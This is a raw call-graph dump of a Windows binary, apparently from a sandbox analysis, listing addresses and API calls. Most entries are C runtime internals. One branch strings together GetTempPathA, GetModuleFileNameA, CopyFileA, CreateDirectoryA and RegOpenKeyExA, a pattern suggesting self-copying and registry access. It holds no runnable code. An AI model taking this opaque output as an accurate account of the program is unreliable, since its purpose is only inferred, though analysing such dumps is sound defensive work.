105e1b4 18229->18250 18232 105ea7b 18232->18210 18255 105d301 18233->18255 18287 105dd49 GetLastError 18234->18287 18236 105b4a7 18237 105b97e 18236->18237 18351 105b91a 18237->18351 18239 105b98a 18239->18207 18376 105cc4b LeaveCriticalSection 18240->18376 18242 105eb53 18242->18207 18249 105f5e3 _unexpected 18243->18249 18244 105f623 18246 105b4a2 __dosmaperr 13 API calls 18244->18246 18245 105f60e RtlAllocateHeap 18247 105f621 18245->18247 18245->18249 18246->18247 18247->18229 18249->18244 18249->18245 18261 105b9f9 18249->18261 18274 105df73 18250->18274 18252 105e1d0 18253 105e1ee InitializeCriticalSectionAndSpinCount 18252->18253 18254 105e1d9 18252->18254 18253->18254 18254->18229 18256 105d30c HeapFree 18255->18256 18260 105d335 __dosmaperr 18255->18260 18257 105d321 18256->18257 18256->18260 18258 105b4a2 __dosmaperr 12 API calls 18257->18258 18259 105d327 GetLastError 18258->18259 18259->18260 18260->18232 18264 105ba26 18261->18264 18265 105ba32 CallCatchBlock 18264->18265 18270 105cc03 EnterCriticalSection 18265->18270 18267 105ba3d 18271 105ba79 18267->18271 18270->18267 18272 105cc4b __FrameHandler3::FrameUnwindToState LeaveCriticalSection 18271->18272 18273 105ba04 18272->18273 18273->18249 18275 105dfa1 18274->18275 18279 105df9d _unexpected 18274->18279 18275->18279 18280 105deac 18275->18280 18278 105dfbb GetProcAddress 18278->18279 18279->18252 18284 105debd ___vcrt_FlsFree 18280->18284 18281 105df68 18281->18278 18281->18279 18282 105dedb LoadLibraryExW 18283 105def6 GetLastError 18282->18283 18282->18284 18283->18284 18284->18281 18284->18282 18285 105df51 FreeLibrary 18284->18285 18286 105df29 LoadLibraryExW 18284->18286 18285->18284 18286->18284 18288 105dd60 18287->18288 18291 105dd66 18287->18291 18310 105e133 18288->18310 18307 105dd6c SetLastError 18291->18307 18315 105e172 18291->18315 18293 105f5d6 _unexpected 12 API calls 18294 105dd94 18293->18294 18296 105ddb3 18294->18296 18297 105dd9c 18294->18297 18299 105e172 _unexpected 6 API calls 18296->18299 18298 105e172 _unexpected 6 API calls 18297->18298 18300 105ddaa 18298->18300 18301 105ddbf 18299->18301 18304 105d301 _free 12 API calls 18300->18304 18302 105ddd4 18301->18302 18303 105ddc3 18301->18303 18320 105da20 18302->18320 18305 105e172 _unexpected 6 API calls 18303->18305 18304->18307 18305->18300 18307->18236 18309 105d301 _free 12 API calls 18309->18307 18311 105df73 _unexpected 5 API calls 18310->18311 18312 105e14f 18311->18312 18313 105e158 18312->18313 18314 105e16a TlsGetValue 18312->18314 18313->18291 18316 105df73 _unexpected 5 API calls 18315->18316 18317 105e18e 18316->18317 18318 105dd84 18317->18318 18319 105e1ac TlsSetValue 18317->18319 18318->18293 18318->18307 18325 105d8b4 18320->18325 18326 105d8c0 CallCatchBlock 18325->18326 18339 105cc03 EnterCriticalSection 18326->18339 18328 105d8ca 18340 105d8fa 18328->18340 18331 105d9c6 18332 105d9d2 CallCatchBlock 18331->18332 18343 105cc03 EnterCriticalSection 18332->18343 18334 105d9dc 18344 105dba7 18334->18344 18336 105d9f4 18348 105da14 18336->18348 18339->18328 18341 105cc4b __FrameHandler3::FrameUnwindToState LeaveCriticalSection 18340->18341 18342 105d8e8 18341->18342 18342->18331 18343->18334 18345 105dbb6 __fassign 18344->18345 18347 105dbdd __fassign 18344->18347 18346 1061373 __fassign 14 API calls 18345->18346 18345->18347 18346->18347 18347->18336 18349 105cc4b __FrameHandler3::FrameUnwindToState LeaveCriticalSection 18348->18349 18350 105da02 18349->18350 18350->18309 18352 105dd49 __dosmaperr 14 API calls 18351->18352 18353 105b925 18352->18353 18356 105b933 18353->18356 18359 105b9ab IsProcessorFeaturePresent 18353->18359 18355 105b97d 18357 105b91a ___std_exception_copy 25 API calls 18355->18357 18356->18239 18358 105b98a 18357->18358 18358->18239 18360 105b9b7 18359->18360 18363 105b7d2 18360->18363 18364 105b7ee ___scrt_fastfail 18363->18364 18365 105b81a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18364->18365 18367 105b8eb ___scrt_fastfail 18365->18367 18369 1056cc2 18367->18369 18368 105b909 GetCurrentProcess TerminateProcess 18368->18355 18370 1056ccd IsProcessorFeaturePresent 18369->18370 18371 1056ccb 18369->18371 18373 1056ef4 18370->18373 18371->18368 18374 1056eb8 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18373->18374 18375 1056fd7 18374->18375 18375->18368 18376->18242 18377->18225 18379 105beea 18378->18379 18380 105bf00 18378->18380 18379->18380 18384 105bf0d 18379->18384 18380->18059 18382 105bef7 18382->18380 18397 105c05f 18382->18397 18385 105bf16 18384->18385 18386 105bf19 18384->18386 18385->18382 18405 1060366 18386->18405 18391 105bf2b 18393 105d301 _free 14 API calls 18391->18393 18395 105bf5a 18393->18395 18395->18382 18396 105d301 _free 14 API calls 18396->18391 18398 105c0d0 18397->18398 18399 105c06e 18397->18399 18398->18380 18399->18398 18400 105f5d6 _unexpected 14 API calls 18399->18400 18401 105c0d4 18399->18401 18403 1060623 WideCharToMultiByte __wsopen_s 18399->18403 18404 105d301 _free 14 API calls 18399->18404 18400->18399 18402 105d301 _free 14 API calls 18401->18402 18402->18398 18403->18399 18404->18399 18406 106036f 18405->18406 18410 105bf20 18405->18410 18442 105dcaf 18406->18442 18411 1060707 GetEnvironmentStringsW 18410->18411 18412 1060777 18411->18412 18415 106071e 18411->18415 18413 105bf25 18412->18413 18414 106077d FreeEnvironmentStringsW 18412->18414 18413->18391 18425 105bf60 18413->18425 18414->18413 18416 1060623 __wsopen_s WideCharToMultiByte 18415->18416 18417 1060737 18416->18417 18417->18412 18418 1060741 18417->18418 18419 105d7ea __wsopen_s 15 API calls 18418->18419 18420 1060747 18419->18420 18421 106075f 18420->18421 18422 1060623 __wsopen_s WideCharToMultiByte 18420->18422 18423 105d301 _free 14 API calls 18421->18423 18422->18421 18424 1060774 18423->18424 18424->18412 18427 105bf75 18425->18427 18426 105f5d6 _unexpected 14 API calls 18437 105bf9c 18426->18437 18427->18426 18428 105c001 18429 105d301 _free 14 API calls 18428->18429 18430 105bf36 18429->18430 18430->18396 18431 105f5d6 _unexpected 14 API calls 18431->18437 18432 105c003 18776 105c030 18432->18776 18436 105c023 18439 105b9ab ___std_exception_copy 11 API calls 18436->18439 18437->18428 18437->18431 18437->18432 18437->18436 18440 105d301 _free 14 API calls 18437->18440 18767 105ca9c 18437->18767 18438 105d301 _free 14 API calls 18438->18428 18441 105c02f 18439->18441 18440->18437 18443 105dcc0 18442->18443 18444 105dcba 18442->18444 18446 105e172 _unexpected 6 API calls 18443->18446 18466 105dcc6 18443->18466 18445 105e133 _unexpected 6 API calls 18444->18445 18445->18443 18447 105dcda 18446->18447 18448 105f5d6 _unexpected 14 API calls 18447->18448 18447->18466 18450 105dcea 18448->18450 18452 105dd07 18450->18452 18453 105dcf2 18450->18453 18456 105e172 _unexpected 6 API calls 18452->18456 18455 105e172 _unexpected 6 API calls 18453->18455 18454 105dd3f 18467 10601ad 18454->18467 18457 105dcfe 18455->18457 18458 105dd13 18456->18458 18462 105d301 _free 14 API calls 18457->18462 18459 105dd17 18458->18459 18460 105dd26 18458->18460 18463 105e172 _unexpected 6 API calls 18459->18463 18461 105da20 _unexpected 14 API calls 18460->18461 18464 105dd31 18461->18464 18462->18466 18463->18457 18465 105d301 _free 14 API calls 18464->18465 18465->18466 18466->18454 18486 105ca58 18466->18486 18575 10602c6 18467->18575 18472 10601d9 18472->18410 18474 10601ea 18475 106021c 18474->18475 18600 10603c1 18474->18600 18477 105d301 _free 14 API calls 18475->18477 18479 106022a 18477->18479 18479->18410 18480 1060217 18481 105b4a2 __dosmaperr 14 API calls 18480->18481 18481->18475 18482 106025e 18482->18475 18611 105fe47 18482->18611 18483 1060232 18483->18482 18484 105d301 _free 14 API calls 18483->18484 18484->18482 18497 1060ce2 18486->18497 18489 105ca68 18491 105ca91 18489->18491 18492 105ca72 IsProcessorFeaturePresent 18489->18492 18494 105a713 __FrameHandler3::FrameUnwindToState 23 API calls 18491->18494 18493 105ca7e 18492->18493 18496 105b7d2 __FrameHandler3::FrameUnwindToState 8 API calls 18493->18496 18495 105ca9b 18494->18495 18496->18491 18527 1060c14 18497->18527 18500 1060d30 18501 1060d3c CallCatchBlock 18500->18501 18502 1060d63 __FrameHandler3::FrameUnwindToState 18501->18502 18503 105dd49 __dosmaperr 14 API calls 18501->18503 18507 1060d69 __FrameHandler3::FrameUnwindToState 18501->18507 18504 1060dae 18502->18504 18502->18507 18526 1060d98 18502->18526 18503->18502 18505 105b4a2 __dosmaperr 14 API calls 18504->18505 18506 1060db3 18505->18506 18508 105b97e ___std_exception_copy 25 API calls 18506->18508 18510 1060dda 18507->18510 18538 105cc03 EnterCriticalSection 18507->18538 18508->18526 18512 1060f17 18510->18512 18513 1060e22 18510->18513 18523 1060e4d 18510->18523 18515 1060f22 18512->18515 18573 105cc4b LeaveCriticalSection 18512->18573 18513->18523 18539 1060d27 18513->18539 18517 105a713 __FrameHandler3::FrameUnwindToState 23 API calls 18515->18517 18519 1060f2a 18517->18519 18522 1060d27 __FrameHandler3::FrameUnwindToState 37 API calls 18522->18523 18542 1060ec3 18523->18542 18524 1060ea1 18525 105dbf2 _unexpected 37 API calls 18524->18525 18524->18526 18525->18526 18526->18489 18528 1060c20 CallCatchBlock 18527->18528 18533 105cc03 EnterCriticalSection 18528->18533 18530 1060c2e 18534 1060c6c 18530->18534 18533->18530 18537 105cc4b LeaveCriticalSection 18534->18537 18536 105ca5d 18536->18489 18536->18500 18537->18536 18538->18510 18540 105dbf2 _unexpected 37 API calls 18539->18540 18541 1060d2c 18540->18541 18541->18522 18543 1060ec9 18542->18543 18545 1060e92 18542->18545 18574 105cc4b LeaveCriticalSection 18543->18574 18545->18524 18545->18526 18546 105dbf2 GetLastError 18545->18546 18547 105dc0f 18546->18547 18548 105dc09 18546->18548 18549 105e172 _unexpected 6 API calls 18547->18549 18572 105dc15 SetLastError 18547->18572 18550 105e133 _unexpected 6 API calls 18548->18550 18551 105dc2d 18549->18551 18550->18547 18552 105f5d6 _unexpected 14 API calls 18551->18552 18551->18572 18553 105dc3d 18552->18553 18555 105dc45 18553->18555 18556 105dc5c 18553->18556 18559 105e172 _unexpected 6 API calls 18555->18559 18561 105e172 _unexpected 6 API calls 18556->18561 18557 105dca3 18557->18524 18558 105dca9 18560 105ca58 __FrameHandler3::FrameUnwindToState 35 API calls 18558->18560 18562 105dc53 18559->18562 18563 105dcae 18560->18563 18564 105dc68 18561->18564 18568 105d301 _free 14 API calls 18562->18568 18565 105dc7d 18564->18565 18566 105dc6c 18564->18566 18567 105da20 _unexpected 14 API calls 18565->18567 18569 105e172 _unexpected 6 API calls 18566->18569 18570 105dc88 18567->18570 18568->18572 18569->18562 18571 105d301 _free 14 API calls 18570->18571 18571->18572 18572->18557 18572->18558 18573->18515 18574->18545 18576 10602d2 CallCatchBlock 18575->18576 18577 10602ec 18576->18577 18619 105cc03 EnterCriticalSection 18576->18619 18580 10601c0 18577->18580 18582 105ca58 __FrameHandler3::FrameUnwindToState 37 API calls 18577->18582 18579 1060328 18620 1060345 18579->18620 18586 105ff55 18580->18586 18584 1060365 18582->18584 18583 10602fc 18583->18579 18585 105d301 _free 14 API calls 18583->18585 18585->18579 18624 105a9fd 18586->18624 18589 105ff76 GetOEMCP 18591 105ff9f 18589->18591 18590 105ff88 18590->18591 18592 105ff8d GetACP 18590->18592 18591->18472 18593 105d7ea 18591->18593 18592->18591 18594 105d828 18593->18594 18598 105d7f8 _unexpected 18593->18598 18595 105b4a2 __dosmaperr 14 API calls 18594->18595 18597 105d826 18595->18597 18596 105d813 HeapAlloc 18596->18597 18596->18598 18597->18474 18598->18594 18598->18596 18599 105b9f9 _unexpected 2 API calls 18598->18599 18599->18598 18601 105ff55 39 API calls 18600->18601 18602 10603e1 18601->18602 18604 106041b IsValidCodePage 18602->18604 18608 1060457 ___scrt_fastfail 18602->18608 18603 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 18605 106020f 18603->18605 18606 106042d 18604->18606 18604->18608 18605->18480 18605->18483 18607 106045c GetCPInfo 18606->18607 18610 1060436 ___scrt_fastfail 18606->18610 18607->18608 18607->18610 18608->18603 18666 106002c 18610->18666 18612 105fe53 CallCatchBlock 18611->18612 18741 105cc03 EnterCriticalSection 18612->18741 18614 105fe5d 18742 105fe94 18614->18742 18619->18583 18623 105cc4b LeaveCriticalSection 18620->18623 18622 106034c 18622->18577 18623->18622 18625 105aa1d 18624->18625 18631 105aa14 18624->18631 18626 105dbf2 _unexpected 37 API calls 18625->18626 18625->18631 18627 105aa3d 18626->18627 18632 105e2ee 18627->18632 18631->18589 18631->18590 18633 105e301 18632->18633 18634 105aa53 18632->18634 18633->18634 18640 10615bf 18633->18640 18636 105e31b 18634->18636 18637 105e343 18636->18637 18638 105e32e 18636->18638 18637->18631 18638->18637 18661 10603ae 18638->18661 18641 10615cb CallCatchBlock 18640->18641 18642 105dbf2 _unexpected 37 API calls 18641->18642 18643 10615d4 18642->18643 18650 106161a 18643->18650 18653 105cc03 EnterCriticalSection 18643->18653 18645 10615f2 18654 1061640 18645->18654 18650->18634 18651 105ca58 __FrameHandler3::FrameUnwindToState 37 API calls 18652 106163f 18651->18652 18653->18645 18655 106164e __fassign 18654->18655 18657 1061603 18654->18657 18656 1061373 __fassign 14 API calls 18655->18656 18655->18657 18656->18657 18658 106161f 18657->18658 18659 105cc4b __FrameHandler3::FrameUnwindToState LeaveCriticalSection 18658->18659 18660 1061616 18659->18660 18660->18650 18660->18651 18662 105dbf2 _unexpected 37 API calls 18661->18662 18663 10603b8 18662->18663 18664 10602c6 __fassign 37 API calls 18663->18664 18665 10603be 18664->18665 18665->18637 18667 1060054 GetCPInfo 18666->18667 18668 106011d 18666->18668 18667->18668 18673 106006c 18667->18673 18669 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 18668->18669 18671 10601ab 18669->18671 18671->18608 18677 10611d3 18673->18677 18676 106482e 41 API calls 18676->18668 18678 105a9fd __fassign 37 API calls 18677->18678 18679 10611f3 18678->18679 18697 105d838 18679->18697 18681 1061220 18684 105d7ea __wsopen_s 15 API calls 18681->18684 18687 10612b1 18681->18687 18688 1061246 __alloca_probe_16 ___scrt_fastfail 18681->18688 18682 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 18685 10600d4 18682->18685 18683 10612ab 18700 10612d6 18683->18700 18684->18688 18692 106482e 18685->18692 18687->18682 18688->18683 18689 105d838 __fassign MultiByteToWideChar 18688->18689 18690 1061294 18689->18690 18690->18683 18691 106129b GetStringTypeW 18690->18691 18691->18683 18693 105a9fd __fassign 37 API calls 18692->18693 18694 1064841 18693->18694 18704 1064644 18694->18704 18698 105d849 MultiByteToWideChar 18697->18698 18698->18681 18701 10612f3 18700->18701 18702 10612e2 18700->18702 18701->18687 18702->18701 18703 105d301 _free 14 API calls 18702->18703 18703->18701 18705 106465f 18704->18705 18706 105d838 __fassign MultiByteToWideChar 18705->18706 18710 10646a3 18706->18710 18707 1064808 18708 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 18707->18708 18709 10600f5 18708->18709 18709->18676 18710->18707 18711 105d7ea __wsopen_s 15 API calls 18710->18711 18714 10646c8 __alloca_probe_16 18710->18714 18711->18714 18712 105d838 __fassign MultiByteToWideChar 18715 106470e 18712->18715 18713 10612d6 __freea 14 API calls 18713->18707 18714->18712 18726 106476d 18714->18726 18715->18726 18732 105e1ff 18715->18732 18718 1064744 18720 105e1ff 6 API calls 18718->18720 18718->18726 18719 106477c 18722 105d7ea __wsopen_s 15 API calls 18719->18722 18725 106478e __alloca_probe_16 18719->18725 18720->18726 18721 10647f9 18724 10612d6 __freea 14 API calls 18721->18724 18722->18725 18723 105e1ff 6 API calls 18727 10647d6 18723->18727 18724->18726 18725->18721 18725->18723 18726->18713 18727->18721 18738 1060623 18727->18738 18729 10647f0 18729->18721 18730 1064825 18729->18730 18731 10612d6 __freea 14 API calls 18730->18731 18731->18726 18733 105de78 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 18732->18733 18734 105e20a 18733->18734 18735 105e25c LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 18734->18735 18737 105e210 18734->18737 18736 105e250 LCMapStringW 18735->18736 18736->18737 18737->18718 18737->18719 18737->18726 18740 106063c WideCharToMultiByte 18738->18740 18740->18729 18741->18614 18752 105e7bb 18742->18752 18744 105feb6 18745 105e7bb 25 API calls 18744->18745 18746 105fed5 18745->18746 18747 105fe6a 18746->18747 18748 105d301 _free 14 API calls 18746->18748 18749 105fe88 18747->18749 18748->18747 18766 105cc4b LeaveCriticalSection 18749->18766 18751 105fe76 18751->18475 18753 105e7cc 18752->18753 18762 105e7c8 __wsopen_s 18752->18762 18754 105e7d3 18753->18754 18757 105e7e6 ___scrt_fastfail 18753->18757 18755 105b4a2 __dosmaperr 14 API calls 18754->18755 18756 105e7d8 18755->18756 18758 105b97e ___std_exception_copy 25 API calls 18756->18758 18759 105e814 18757->18759 18760 105e81d 18757->18760 18757->18762 18758->18762 18761 105b4a2 __dosmaperr 14 API calls 18759->18761 18760->18762 18764 105b4a2 __dosmaperr 14 API calls 18760->18764 18763 105e819 18761->18763 18762->18744 18765 105b97e ___std_exception_copy 25 API calls 18763->18765 18764->18763 18765->18762 18766->18751 18768 105cab7 18767->18768 18769 105caa9 18767->18769 18770 105b4a2 __dosmaperr 14 API calls 18768->18770 18769->18768 18774 105cace 18769->18774 18771 105cabf 18770->18771 18772 105b97e ___std_exception_copy 25 API calls 18771->18772 18773 105cac9 18772->18773 18773->18437 18774->18773 18775 105b4a2 __dosmaperr 14 API calls 18774->18775 18775->18771 18780 105c009 18776->18780 18781 105c03d 18776->18781 18777 105c054 18778 105d301 _free 14 API calls 18777->18778 18778->18780 18779 105d301 _free 14 API calls 18779->18781 18780->18438 18781->18777 18781->18779 18942 1055760 18782->18942 18784 1049cab 18956 1042be0 18784->18956 18787 1049cf8 18787->18787 18969 1055ac0 18787->18969 18789 1049d14 18982 1055c10 18789->18982 18791 1049dba 18793 1055760 27 API calls 18791->18793 18792 1049d2a 18792->18791 18794 104a135 18792->18794 18795 1049dee 18793->18795 19039 105b98e 18794->19039 18796 1042be0 42 API calls 18795->18796 18798 1049df9 18796->18798 18990 1055f90 18798->18990 18799 104a13a 18800 105b98e 25 API calls 18799->18800 18804 104a13f 18800->18804 18802 1049e15 18803 1055c10 27 API calls 18802->18803 18807 1049e2a 18803->18807 18805 104a158 CopyFileA 18804->18805 19028 1045000 18805->19028 18806 1049ec4 GetModuleFileNameA 18810 1049f17 18806->18810 18807->18799 18807->18806 18809 1049eba 18807->18809 18809->18806 18810->18810 18812 1055ac0 27 API calls 18810->18812 18811 104a16a 18840 1049fc8 18811->18840 19035 1055720 18811->19035 18820 1049f33 18812->18820 18813 105a74f 23 API calls 18815 104a1c4 18813->18815 18817 105b98e 25 API calls 18815->18817 18821 104a1c9 18817->18821 18818 1055760 27 API calls 18822 104a19e 18818->18822 18819 104a037 18819->18815 18826 104a111 18819->18826 18820->18819 18999 105a81c 18820->18999 18824 1055720 27 API calls 18822->18824 18824->18840 18828 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 18826->18828 18831 104a131 18828->18831 18829 105a81c 28 API calls 18832 1049fbb 18829->18832 18830 1049f7c 19015 105ab37 18830->19015 18831->18062 18833 1049fd0 GetFileAttributesA 18832->18833 18834 1049fc2 18832->18834 18837 1049ff6 CreateDirectoryA 18833->18837 18838 1049ff2 18833->18838 18836 105a8aa 67 API calls 18834->18836 18836->18840 18841 104a013 GetFileAttributesA 18837->18841 18838->18837 18838->18841 18839 1049f99 18839->18829 18840->18813 18841->18819 18842 104a02f 18841->18842 18842->18804 18842->18819 18844 1049826 18843->18844 18845 1055760 27 API calls 18844->18845 18912 1049ae6 18844->18912 18847 1049845 18845->18847 18846 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 18848 1049b06 18846->18848 18849 1042be0 42 API calls 18847->18849 18848->18064 18850 104984c 18849->18850 18851 1055760 27 API calls 18850->18851 18852 1049864 18851->18852 18853 1042be0 42 API calls 18852->18853 18854 104986b 18853->18854 19562 1042d10 18854->19562 18857 1055760 27 API calls 18858 1049898 18857->18858 18859 1042be0 42 API calls 18858->18859 18860 10498a3 18859->18860 18861 10498ee 18860->18861 18862 1049b0a 18860->18862 18865 1055ac0 27 API calls 18861->18865 18863 1049b0f 18862->18863 19591 1055c00 18862->19591 18866 105b98e 25 API calls 18863->18866 18867 1049911 18865->18867 18868 1049b14 18866->18868 18869 1055760 27 API calls 18867->18869 18870 105b98e 25 API calls 18868->18870 18871 1049928 18869->18871 18872 1049b19 18870->18872 18873 1042be0 42 API calls 18871->18873 19594 1045d30 GetModuleFileNameA 18872->19594 18874 1049930 18873->18874 18876 1055c10 27 API calls 18874->18876 18877 1049941 18876->18877 19576 10556a0 18877->19576 18880 1055760 27 API calls 18881 1049b6d 18880->18881 18882 1042be0 42 API calls 18881->18882 18883 1049b75 18882->18883 18884 1055c10 27 API calls 18883->18884 18886 1049b85 18884->18886 18885 104994d 18885->18863 18891 1049a58 18885->18891 18888 1055760 27 API calls 18886->18888 18887 1055760 27 API calls 18889 1049a73 18887->18889 18890 1049ba0 18888->18890 18892 1055760 27 API calls 18889->18892 18893 1042be0 42 API calls 18890->18893 18891->18887 18895 1049a8e 18892->18895 18894 1049ba7 18893->18894 18896 1055760 27 API calls 18894->18896 18897 1042be0 42 API calls 18895->18897 18899 1049bbc 18896->18899 18898 1049a95 18897->18898 18900 1055760 27 API calls 18898->18900 18901 1042be0 42 API calls 18899->18901 18902 1049aaa 18900->18902 18903 1049bc3 18901->18903 18904 1042be0 42 API calls 18902->18904 18905 1042ea0 28 API calls 18903->18905 18906 1049ab1 18904->18906 18910 1049bcf 18905->18910 19581 1042ea0 RegOpenKeyExA 18906->19581 18909 1049c3a 18909->18064 18910->18909 18911 105b98e 25 API calls 18910->18911 18913 1049c59 18911->18913 18912->18846 18915 10491a6 18914->18915 18915->18915 18916 1055ac0 27 API calls 18915->18916 18917 10491c2 18916->18917 18918 1055760 27 API calls 18917->18918 18919 1049556 18918->18919 18920 1042be0 42 API calls 18919->18920 18921 1049561 18920->18921 18922 1055760 27 API calls 18921->18922 18923 104957a 18922->18923 19627 10451e0 18923->19627 18926 1055760 27 API calls 18927 104959c 18926->18927 18928 1042be0 42 API calls 18927->18928 18929 10495a7 18928->18929 18930 1055c10 27 API calls 18929->18930 18931 10495bb 18930->18931 18932 1055c10 27 API calls 18931->18932 18933 10495cb 18932->18933 18934 1055760 27 API calls 18933->18934 18935 10495e9 18934->18935 18936 1042be0 42 API calls 18935->18936 18937 10495f0 18936->18937 18938 1055ac0 27 API calls 18937->18938 18939 1049613 18938->18939 18940 105b98e 25 API calls 18939->18940 18941 1049782 18940->18941 18943 1055786 18942->18943 18944 105578d 18943->18944 18945 10557e1 18943->18945 18946 10557c2 18943->18946 18944->18784 18949 10570b4 27 API calls 18945->18949 18953 10557d6 __wsopen_s 18945->18953 18947 1055819 18946->18947 18948 10557c9 18946->18948 19058 1042150 18947->19058 19044 10570b4 18948->19044 18949->18953 18952 10557cf 18952->18953 18954 105b98e 25 API calls 18952->18954 18953->18784 18955 1055823 18954->18955 19085 10429b0 18956->19085 18962 1042cfb 18965 105b98e 25 API calls 18962->18965 18963 1042c4b 18963->18962 18968 1042cd5 18963->18968 18964 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 18966 1042cf7 GetTempPathA 18964->18966 18967 1042d00 18965->18967 18966->18787 18968->18964 18971 1055ade __InternalCxxFrameHandler 18969->18971 18972 1055b04 18969->18972 18970 1055bee 18973 1042150 Concurrency::cancel_current_task 27 API calls 18970->18973 18971->18789 18972->18970 18974 1055b7d 18972->18974 18975 1055b58 18972->18975 18976 1055bf8 18973->18976 18977 10570b4 27 API calls 18974->18977 18979 1055b69 __wsopen_s 18974->18979 18975->18970 18978 10570b4 27 API calls 18975->18978 18977->18979 18978->18979 18980 1055bd0 18979->18980 18981 105b98e 25 API calls 18979->18981 18980->18789 18981->18970 18983 1055c38 18982->18983 18985 1055c82 18982->18985 18984 1055c41 18983->18984 18983->18985 18986 10568c0 27 API calls 18984->18986 18987 1055c91 __InternalCxxFrameHandler 18985->18987 19167 1056460 18985->19167 18989 1055c4a 18986->18989 18987->18792 18989->18792 18991 1055ff0 18990->18991 18991->18991 19180 1056720 18991->19180 18993 1056009 18994 1056460 27 API calls 18993->18994 18995 1056024 __InternalCxxFrameHandler 18993->18995 18994->18995 18996 1056079 __InternalCxxFrameHandler 18995->18996 18997 1056460 27 API calls 18995->18997 18996->18802 18998 10560c1 18997->18998 18998->18802 19192 105a765 18999->19192 19002 105a8aa 19003 105a8b6 CallCatchBlock 19002->19003 19004 105a8d5 19003->19004 19005 105a8c0 19003->19005 19011 105a8d0 19004->19011 19243 105cda7 EnterCriticalSection 19004->19243 19006 105b4a2 __dosmaperr 14 API calls 19005->19006 19007 105a8c5 19006->19007 19009 105b97e ___std_exception_copy 25 API calls 19007->19009 19009->19011 19010 105a8f2 19244 105a833 19010->19244 19011->18830 19013 105a8fd 19260 105a924 19013->19260 19016 105ab45 19015->19016 19017 105ab4f 19015->19017 19019 105e348 16 API calls 19016->19019 19513 105aa80 19017->19513 19021 105ab4c 19019->19021 19021->18839 19024 105ab7d 19026 105ab9b 19024->19026 19027 105d301 _free 14 API calls 19024->19027 19026->18839 19027->19026 19029 1045006 19028->19029 19030 105a81c 28 API calls 19029->19030 19031 1045013 19030->19031 19032 1045026 19031->19032 19033 105a8aa 67 API calls 19031->19033 19032->18811 19034 1045020 19033->19034 19034->18811 19036 1055740 19035->19036 19036->19036 19037 1055ac0 27 API calls 19036->19037 19038 104a183 19037->19038 19038->18818 19040 105b91a ___std_exception_copy 25 API calls 19039->19040 19041 105b99d 19040->19041 19042 105b9ab ___std_exception_copy 11 API calls 19041->19042 19043 105b9aa 19042->19043 19047 10570b9 19044->19047 19046 10570d3 19046->18952 19047->19046 19048 105b9f9 _unexpected 2 API calls 19047->19048 19049 10570d5 19047->19049 19075 105b9df 19047->19075 19048->19047 19050 1042150 Concurrency::cancel_current_task 19049->19050 19051 10570df 19049->19051 19064 1058133 19050->19064 19053 1058133 std::_Xinvalid_argument RaiseException 19051->19053 19055 10577ac 19053->19055 19054 104216c 19067 1057ef8 19054->19067 19059 104215e Concurrency::cancel_current_task 19058->19059 19060 1058133 std::_Xinvalid_argument RaiseException 19059->19060 19061 104216c 19060->19061 19062 1057ef8 ___std_exception_copy 26 API calls 19061->19062 19063 1042193 19062->19063 19063->18952 19065 105817d RaiseException 19064->19065 19066 105814d 19064->19066 19065->19054 19066->19065 19068 1057f05 19067->19068 19074 1042193 19067->19074 19069 105b9df ___std_exception_copy 15 API calls 19068->19069 19068->19074 19070 1057f22 19069->19070 19071 105ca9c ___std_exception_copy 25 API calls 19070->19071 19073 1057f32 19070->19073 19071->19073 19082 105b794 19073->19082 19074->18952 19080 105d7ea _unexpected 19075->19080 19076 105d828 19077 105b4a2 __dosmaperr 14 API calls 19076->19077 19079 105d826 19077->19079 19078 105d813 HeapAlloc 19078->19079 19078->19080 19079->19047 19080->19076 19080->19078 19081 105b9f9 _unexpected 2 API calls 19080->19081 19081->19080 19083 105d301 _free 14 API calls 19082->19083 19084 105b7ac 19083->19084 19084->19074 19105 1055980 19085->19105 19087 10429da 19088 1042a50 19087->19088 19089 1055980 27 API calls 19088->19089 19092 1042a84 19089->19092 19090 1042bb6 19093 10426d0 19090->19093 19092->19090 19118 105ac50 19092->19118 19094 10570b4 27 API calls 19093->19094 19103 1042770 19094->19103 19095 1042956 19096 104297c 19095->19096 19098 10429a6 19095->19098 19097 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19096->19097 19099 104299f 19097->19099 19100 105b98e 25 API calls 19098->19100 19099->18963 19101 10429ab 19100->19101 19102 1055ac0 27 API calls 19102->19103 19103->19095 19103->19098 19103->19102 19146 10568c0 19103->19146 19107 1055998 ___scrt_fastfail 19105->19107 19108 10559bf 19105->19108 19106 1055aa8 19109 1042150 Concurrency::cancel_current_task 27 API calls 19106->19109 19107->19087 19108->19106 19110 1055a13 19108->19110 19111 1055a38 19108->19111 19112 1055ab2 19109->19112 19110->19106 19114 10570b4 27 API calls 19110->19114 19113 10570b4 27 API calls 19111->19113 19115 1055a24 ___scrt_fastfail 19111->19115 19113->19115 19114->19115 19116 105b98e 25 API calls 19115->19116 19117 1055a8a 19115->19117 19116->19106 19117->19087 19119 105ac5e 19118->19119 19122 105ac6c __fassign 19118->19122 19123 105abc3 19119->19123 19122->19092 19124 105a9fd __fassign 37 API calls 19123->19124 19125 105abd6 19124->19125 19128 105abfc 19125->19128 19127 105abe7 19127->19092 19129 105ac39 19128->19129 19130 105ac09 19128->19130 19141 105e370 19129->19141 19132 105ac18 __fassign 19130->19132 19134 105e394 19130->19134 19132->19127 19135 105a9fd __fassign 37 API calls 